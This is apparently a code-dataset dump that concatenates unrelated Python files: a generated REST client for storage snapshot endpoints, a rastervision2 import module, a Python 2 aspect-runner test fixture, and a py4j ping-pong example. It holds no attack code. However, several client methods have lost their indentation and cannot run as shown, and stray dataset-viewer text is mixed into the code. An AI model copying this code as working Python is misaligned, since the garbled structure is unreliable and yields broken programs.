        all_params = ['limit', 'resume']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here, before any further locals are
        # bound; validated kwargs are folded into this dict for call_api().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_snapshot_changelists" % key
                )
            params[key] = val
        del params['kwargs']

        # Range/length validation emitted from the API schema.  The
        # `len(...) < 0` check can never fire; kept verbatim as generated.
        if 'limit' in params and params['limit'] > 4294967295:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_changelists`, must be a value less than or equal to `4294967295`")  # noqa: E501
        if 'limit' in params and params['limit'] < 1:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_changelists`, must be a value greater than or equal to `1`")  # noqa: E501
        if ('resume' in params and
                len(params['resume']) > 8192):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_changelists`, length must be less than or equal to `8192`")  # noqa: E501
        if ('resume' in params and
                len(params['resume']) < 0):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_changelists`, length must be greater than or equal to `0`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'resume' in params:
            query_params.append(('resume', params['resume']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth']  # noqa: E501

        # Dispatch the REST call through the shared API client.
        return self.api_client.call_api(
            '/platform/1/snapshot/changelists', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SnapshotChangelistsExtended',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def list_snapshot_repstates(self, **kwargs): # noqa: E501
"""list_snapshot_repstates # noqa: E501
List all repstates. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_repstates(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotRepstatesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_repstates_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_repstates_with_http_info(**kwargs) # noqa: E501
return data
    def list_snapshot_repstates_with_http_info(self, **kwargs):  # noqa: E501
        """list_snapshot_repstates  # noqa: E501

        List all repstates.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.list_snapshot_repstates_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int limit: Return no more than this many results at once (see resume).
        :param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
        :return: SnapshotRepstatesExtended
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted query parameters for this endpoint.
        all_params = ['limit', 'resume']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here, before any further locals are
        # bound; validated kwargs are folded into this dict for call_api().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_snapshot_repstates" % key
                )
            params[key] = val
        del params['kwargs']

        # Range/length validation emitted from the API schema.  The
        # `len(...) < 0` check can never fire; kept verbatim as generated.
        if 'limit' in params and params['limit'] > 4294967295:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_repstates`, must be a value less than or equal to `4294967295`")  # noqa: E501
        if 'limit' in params and params['limit'] < 1:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_repstates`, must be a value greater than or equal to `1`")  # noqa: E501
        if ('resume' in params and
                len(params['resume']) > 8192):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_repstates`, length must be less than or equal to `8192`")  # noqa: E501
        if ('resume' in params and
                len(params['resume']) < 0):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_repstates`, length must be greater than or equal to `0`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'resume' in params:
            query_params.append(('resume', params['resume']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth']  # noqa: E501

        # Dispatch the REST call through the shared API client.
        return self.api_client.call_api(
            '/platform/1/snapshot/repstates', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SnapshotRepstatesExtended',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def list_snapshot_schedules(self, **kwargs): # noqa: E501
"""list_snapshot_schedules # noqa: E501
List all or matching schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_schedules(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, pattern, schedule, duration, alias, next_run, and next_snapshot. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotSchedulesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
return data
    def list_snapshot_schedules_with_http_info(self, **kwargs):  # noqa: E501
        """list_snapshot_schedules  # noqa: E501

        List all or matching schedules.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.list_snapshot_schedules_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str sort: The field that will be used for sorting. Choices are id, name, path, pattern, schedule, duration, alias, next_run, and next_snapshot. Default is id.
        :param int limit: Return no more than this many results at once (see resume).
        :param str dir: The direction of the sort.
        :param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
        :return: SnapshotSchedulesExtended
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted query parameters for this endpoint.
        all_params = ['sort', 'limit', 'dir', 'resume']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here, before any further locals are
        # bound; validated kwargs are folded into this dict for call_api().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_snapshot_schedules" % key
                )
            params[key] = val
        del params['kwargs']

        # Range/length validation emitted from the API schema.  The
        # `len(...) < 0` checks can never fire; kept verbatim as generated.
        if 'limit' in params and params['limit'] > 4294967295:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_schedules`, must be a value less than or equal to `4294967295`")  # noqa: E501
        if 'limit' in params and params['limit'] < 1:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_schedules`, must be a value greater than or equal to `1`")  # noqa: E501
        if ('dir' in params and
                len(params['dir']) < 0):
            raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_schedules`, length must be greater than or equal to `0`")  # noqa: E501
        if ('resume' in params and
                len(params['resume']) > 8192):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_schedules`, length must be less than or equal to `8192`")  # noqa: E501
        if ('resume' in params and
                len(params['resume']) < 0):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_schedules`, length must be greater than or equal to `0`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'sort' in params:
            query_params.append(('sort', params['sort']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'dir' in params:
            query_params.append(('dir', params['dir']))  # noqa: E501
        if 'resume' in params:
            query_params.append(('resume', params['resume']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth']  # noqa: E501

        # Dispatch the REST call through the shared API client.  Note this
        # endpoint lives under the v3 platform namespace.
        return self.api_client.call_api(
            '/platform/3/snapshot/schedules', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SnapshotSchedulesExtended',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def list_snapshot_snapshots(self, **kwargs): # noqa: E501
"""list_snapshot_snapshots # noqa: E501
List all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_snapshots(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, created, expires, size, has_locks, schedule, alias_target, alias_target_name, pct_filesystem, pct_reserve, and state. Default is id.
:param str schedule: Only list snapshots created by this schedule.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:param str state: Only list snapshots matching this state.
:param int limit: Return no more than this many results at once (see resume).
:param str type: Only list snapshots matching this type.
:param str dir: The direction of the sort.
:return: SnapshotSnapshotsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
return data
    def list_snapshot_snapshots_with_http_info(self, **kwargs):  # noqa: E501
        """list_snapshot_snapshots  # noqa: E501

        List all or matching snapshots.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.list_snapshot_snapshots_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str sort: The field that will be used for sorting. Choices are id, name, path, created, expires, size, has_locks, schedule, alias_target, alias_target_name, pct_filesystem, pct_reserve, and state. Default is id.
        :param str schedule: Only list snapshots created by this schedule.
        :param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
        :param str state: Only list snapshots matching this state.
        :param int limit: Return no more than this many results at once (see resume).
        :param str type: Only list snapshots matching this type.
        :param str dir: The direction of the sort.
        :return: SnapshotSnapshotsExtended
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted query parameters for this endpoint.
        all_params = ['sort', 'schedule', 'resume', 'state', 'limit', 'type', 'dir']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here, before any further locals are
        # bound; validated kwargs are folded into this dict for call_api().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_snapshot_snapshots" % key
                )
            params[key] = val
        del params['kwargs']

        # Range/length validation emitted from the API schema.  The
        # `len(...) < 0` checks can never fire; kept verbatim as generated.
        if ('resume' in params and
                len(params['resume']) > 8192):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_snapshots`, length must be less than or equal to `8192`")  # noqa: E501
        if ('resume' in params and
                len(params['resume']) < 0):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_snapshots`, length must be greater than or equal to `0`")  # noqa: E501
        if 'limit' in params and params['limit'] > 4294967295:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_snapshots`, must be a value less than or equal to `4294967295`")  # noqa: E501
        if 'limit' in params and params['limit'] < 1:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_snapshots`, must be a value greater than or equal to `1`")  # noqa: E501
        if ('dir' in params and
                len(params['dir']) < 0):
            raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_snapshots`, length must be greater than or equal to `0`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'sort' in params:
            query_params.append(('sort', params['sort']))  # noqa: E501
        if 'schedule' in params:
            query_params.append(('schedule', params['schedule']))  # noqa: E501
        if 'resume' in params:
            query_params.append(('resume', params['resume']))  # noqa: E501
        if 'state' in params:
            query_params.append(('state', params['state']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'type' in params:
            query_params.append(('type', params['type']))  # noqa: E501
        if 'dir' in params:
            query_params.append(('dir', params['dir']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth']  # noqa: E501

        # Dispatch the REST call through the shared API client.
        return self.api_client.call_api(
            '/platform/1/snapshot/snapshots', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SnapshotSnapshotsExtended',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def update_snapshot_alias(self, snapshot_alias, snapshot_alias_id, **kwargs):  # noqa: E501
    """Modify a snapshot alias.  # noqa: E501

    All input fields are optional, but one or more must be supplied.
    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead:

    >>> thread = api.update_snapshot_alias(snapshot_alias, snapshot_alias_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SnapshotAlias snapshot_alias: (required)
    :param str snapshot_alias_id: identifier of the alias to modify (required)
    :return: None, or the request thread if called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths return exactly what the
    # *_with_http_info variant returns, so no branching is needed.
    return self.update_snapshot_alias_with_http_info(
        snapshot_alias, snapshot_alias_id, **kwargs)
def update_snapshot_alias_with_http_info(self, snapshot_alias, snapshot_alias_id, **kwargs):  # noqa: E501
    """Modify a snapshot alias (raw HTTP variant).  # noqa: E501

    All input fields are optional, but one or more must be supplied.
    Synchronous by default; pass ``async_req=True`` for the thread:

    >>> thread = api.update_snapshot_alias_with_http_info(snapshot_alias, snapshot_alias_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SnapshotAlias snapshot_alias: (required)
    :param str snapshot_alias_id: identifier of the alias to modify (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: if a required parameter is None.
    """
    # Keyword arguments accepted in addition to the positional ones.
    all_params = ['snapshot_alias', 'snapshot_alias_id',
                  'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']

    # Collect parameters explicitly instead of the generator's fragile
    # ``params = locals()`` reflection (which breaks if any local is
    # added or renamed); also avoids the third-party ``six`` dependency,
    # since dict.items() iterates identically on py2 and py3 here.
    params = {'snapshot_alias': snapshot_alias,
              'snapshot_alias_id': snapshot_alias_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_snapshot_alias" % key
            )
        params[key] = val

    # Required positional parameters must not be None (they are always
    # bound, so the generator's ``not in params`` half was dead code).
    if params['snapshot_alias'] is None:
        raise ValueError("Missing the required parameter `snapshot_alias` when calling `update_snapshot_alias`")  # noqa: E501
    if params['snapshot_alias_id'] is None:
        raise ValueError("Missing the required parameter `snapshot_alias_id` when calling `update_snapshot_alias`")  # noqa: E501

    path_params = {'SnapshotAliasId': params['snapshot_alias_id']}

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }

    # Authentication setting
    auth_settings = ['basicAuth']

    return self.api_client.call_api(
        '/platform/1/snapshot/aliases/{SnapshotAliasId}', 'PUT',
        path_params,
        [],  # this endpoint takes no query parameters
        header_params,
        body=params['snapshot_alias'],
        post_params=[],
        files={},
        response_type=None,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_snapshot_schedule(self, snapshot_schedule, snapshot_schedule_id, **kwargs):  # noqa: E501
    """Modify a snapshot schedule.  # noqa: E501

    All input fields are optional, but one or more must be supplied.
    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead:

    >>> thread = api.update_snapshot_schedule(snapshot_schedule, snapshot_schedule_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SnapshotSchedule snapshot_schedule: (required)
    :param str snapshot_schedule_id: identifier of the schedule to modify (required)
    :return: None, or the request thread if called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths return exactly what the
    # *_with_http_info variant returns, so no branching is needed.
    return self.update_snapshot_schedule_with_http_info(
        snapshot_schedule, snapshot_schedule_id, **kwargs)
def update_snapshot_schedule_with_http_info(self, snapshot_schedule, snapshot_schedule_id, **kwargs):  # noqa: E501
    """Modify a snapshot schedule (raw HTTP variant).  # noqa: E501

    All input fields are optional, but one or more must be supplied.
    Synchronous by default; pass ``async_req=True`` for the thread:

    >>> thread = api.update_snapshot_schedule_with_http_info(snapshot_schedule, snapshot_schedule_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SnapshotSchedule snapshot_schedule: (required)
    :param str snapshot_schedule_id: identifier of the schedule to modify (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: if a required parameter is None.
    """
    # Keyword arguments accepted in addition to the positional ones.
    all_params = ['snapshot_schedule', 'snapshot_schedule_id',
                  'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']

    # Collect parameters explicitly instead of the generator's fragile
    # ``params = locals()`` reflection; also drops the third-party
    # ``six`` dependency (dict.items() is equivalent here).
    params = {'snapshot_schedule': snapshot_schedule,
              'snapshot_schedule_id': snapshot_schedule_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_snapshot_schedule" % key
            )
        params[key] = val

    # Required positional parameters must not be None.
    if params['snapshot_schedule'] is None:
        raise ValueError("Missing the required parameter `snapshot_schedule` when calling `update_snapshot_schedule`")  # noqa: E501
    if params['snapshot_schedule_id'] is None:
        raise ValueError("Missing the required parameter `snapshot_schedule_id` when calling `update_snapshot_schedule`")  # noqa: E501

    path_params = {'SnapshotScheduleId': params['snapshot_schedule_id']}

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }

    # Authentication setting
    auth_settings = ['basicAuth']

    return self.api_client.call_api(
        '/platform/3/snapshot/schedules/{SnapshotScheduleId}', 'PUT',
        path_params,
        [],  # this endpoint takes no query parameters
        header_params,
        body=params['snapshot_schedule'],
        post_params=[],
        files={},
        response_type=None,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_snapshot_settings(self, snapshot_settings, **kwargs):  # noqa: E501
    """Modify one or more snapshot settings.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead:

    >>> thread = api.update_snapshot_settings(snapshot_settings, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SnapshotSettingsExtended snapshot_settings: (required)
    :return: None, or the request thread if called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths return exactly what the
    # *_with_http_info variant returns, so no branching is needed.
    return self.update_snapshot_settings_with_http_info(
        snapshot_settings, **kwargs)
def update_snapshot_settings_with_http_info(self, snapshot_settings, **kwargs):  # noqa: E501
    """Modify one or more snapshot settings (raw HTTP variant).  # noqa: E501

    Synchronous by default; pass ``async_req=True`` for the thread:

    >>> thread = api.update_snapshot_settings_with_http_info(snapshot_settings, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SnapshotSettingsExtended snapshot_settings: (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: if ``snapshot_settings`` is None.
    """
    # Keyword arguments accepted in addition to the positional one.
    all_params = ['snapshot_settings',
                  'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']

    # Collect parameters explicitly instead of the generator's fragile
    # ``params = locals()`` reflection; also drops the third-party
    # ``six`` dependency (dict.items() is equivalent here).
    params = {'snapshot_settings': snapshot_settings}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_snapshot_settings" % key
            )
        params[key] = val

    # The required positional parameter must not be None.
    if params['snapshot_settings'] is None:
        raise ValueError("Missing the required parameter `snapshot_settings` when calling `update_snapshot_settings`")  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }

    # Authentication setting
    auth_settings = ['basicAuth']

    return self.api_client.call_api(
        '/platform/1/snapshot/settings', 'PUT',
        {},  # no path parameters for this endpoint
        [],  # no query parameters either
        header_params,
        body=params['snapshot_settings'],
        post_params=[],
        files={},
        response_type=None,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_snapshot_snapshot(self, snapshot_snapshot, snapshot_snapshot_id, **kwargs):  # noqa: E501
    """Modify a snapshot.  # noqa: E501

    All input fields are optional, but one or more must be supplied.
    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead:

    >>> thread = api.update_snapshot_snapshot(snapshot_snapshot, snapshot_snapshot_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SnapshotSnapshot snapshot_snapshot: (required)
    :param str snapshot_snapshot_id: identifier of the snapshot to modify (required)
    :return: None, or the request thread if called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths return exactly what the
    # *_with_http_info variant returns, so no branching is needed.
    return self.update_snapshot_snapshot_with_http_info(
        snapshot_snapshot, snapshot_snapshot_id, **kwargs)
def update_snapshot_snapshot_with_http_info(self, snapshot_snapshot, snapshot_snapshot_id, **kwargs):  # noqa: E501
    """Modify a snapshot (raw HTTP variant).  # noqa: E501

    All input fields are optional, but one or more must be supplied.
    Synchronous by default; pass ``async_req=True`` for the thread:

    >>> thread = api.update_snapshot_snapshot_with_http_info(snapshot_snapshot, snapshot_snapshot_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SnapshotSnapshot snapshot_snapshot: (required)
    :param str snapshot_snapshot_id: identifier of the snapshot to modify (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: if a required parameter is None.
    """
    # Keyword arguments accepted in addition to the positional ones.
    all_params = ['snapshot_snapshot', 'snapshot_snapshot_id',
                  'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']

    # Collect parameters explicitly instead of the generator's fragile
    # ``params = locals()`` reflection; also drops the third-party
    # ``six`` dependency (dict.items() is equivalent here).
    params = {'snapshot_snapshot': snapshot_snapshot,
              'snapshot_snapshot_id': snapshot_snapshot_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_snapshot_snapshot" % key
            )
        params[key] = val

    # Required positional parameters must not be None.
    if params['snapshot_snapshot'] is None:
        raise ValueError("Missing the required parameter `snapshot_snapshot` when calling `update_snapshot_snapshot`")  # noqa: E501
    if params['snapshot_snapshot_id'] is None:
        raise ValueError("Missing the required parameter `snapshot_snapshot_id` when calling `update_snapshot_snapshot`")  # noqa: E501

    path_params = {'SnapshotSnapshotId': params['snapshot_snapshot_id']}

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }

    # Authentication setting
    auth_settings = ['basicAuth']

    return self.api_client.call_api(
        '/platform/1/snapshot/snapshots/{SnapshotSnapshotId}', 'PUT',
        path_params,
        [],  # this endpoint takes no query parameters
        header_params,
        body=params['snapshot_snapshot'],
        post_params=[],
        files={},
        response_type=None,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
| StarcoderdataPython |
8058007 | <reponame>alexchunet/raster-vision
# flake8: noqa
from rastervision2.pipeline.file_system.file_system import (
FileSystem, NotReadableError, NotWritableError)
from rastervision2.pipeline.file_system.local_file_system import LocalFileSystem
from rastervision2.pipeline.file_system.http_file_system import HttpFileSystem
from rastervision2.pipeline.file_system.utils import *
| StarcoderdataPython |
3531758 | """Dummy dataset to test runner"""
# pylint: disable=R0201,W0613
class DummyPrimaryConcern(object):
    """Dummy primary concern advised by the aspect runner tests."""

    def true(self):
        """Notify (via stdout) that the advised function body ran."""
        # print("...") with a single string behaves identically on
        # Python 2 and 3; the original `print "In true"` statement was
        # Python-2-only syntax and a SyntaxError under Python 3.
        print("In true")
def before(*args, **kwargs):
    """Before advice: announce (via stdout) that the target is about to run.

    Accepts and ignores any arguments so it can wrap any call site.
    """
    # print("...") works identically on Python 2 and 3; the original
    # `print "Before true"` statement was Python-2-only syntax.
    print("Before true")
def after(*args, **kwargs):
    """After advice: announce (via stdout) that the target has returned.

    Accepts and ignores any arguments so it can wrap any call site.
    """
    # print("...") works identically on Python 2 and 3; the original
    # `print "After true"` statement was Python-2-only syntax.
    print("After true")
class DummyRule(object):
    """Rule that wires the dummy advice onto DummyPrimaryConcern.true."""

    def __init__(self, errors):
        """Remember the shared error container supplied by the runner."""
        self.errors = errors

    @property
    def aspects(self):
        """Map the advised concern to its method-pattern/advice table."""
        advice_table = {'true': {'before': before, 'after_finally': after}}
        return {DummyPrimaryConcern: advice_table}
| StarcoderdataPython |
6586586 | <reponame>Asnebula/test_java_env<filename>src/py4j/examples/_3_4_MultiThread/single/PythonPlayer.py
class PythonPlayer(object):
    """Python half of the py4j ping/pong handshake example.

    The Java peer drives ``firstPing``/``secondPing``; this side answers
    with ``firstPong``/``secondPong`` until the exchange completes.
    """

    class Java:
        # py4j reads this to register the object as a Java-side
        # PongPlayer implementation.
        implements = ["py4j.examples._3_4_MultiThread.single.PongPlayer"]

    def start(self, player):
        """Kick off the exchange against the given ping player."""
        return player.firstPing(self)

    def firstPong(self, player):
        """Answer the first ping by requesting the second one."""
        return player.secondPing(self)

    def secondPong(self, player):
        """Terminate the exchange with a success marker."""
        return "Success"
# Start the JVM with "java -cp py4j.jar py4j.examples._3_4_MultiThread.single.SingleThreadApplication"
from py4j.clientserver import ClientServer, JavaParameters, PythonParameters
# Connect this process to the JVM started above; ClientServer is py4j's
# single-thread-per-connection gateway (the point of this "single" example).
gateway = ClientServer(
    java_parameters=JavaParameters(),
    python_parameters=PythonParameters())
# Instantiate the Java-side PingPlayer through the gateway's jvm view, pair
# it with the local PythonPlayer, and run the ping/pong exchange; start()
# is expected to print "Success" once the handshake completes (exact
# behavior depends on the Java PingPlayer implementation — verify there).
ping_player = gateway.jvm.py4j.examples._3_4_MultiThread.single.PingPlayer()
pong_player = PythonPlayer()
print(pong_player.start(ping_player))
Subsets and Splits
No community queries yet
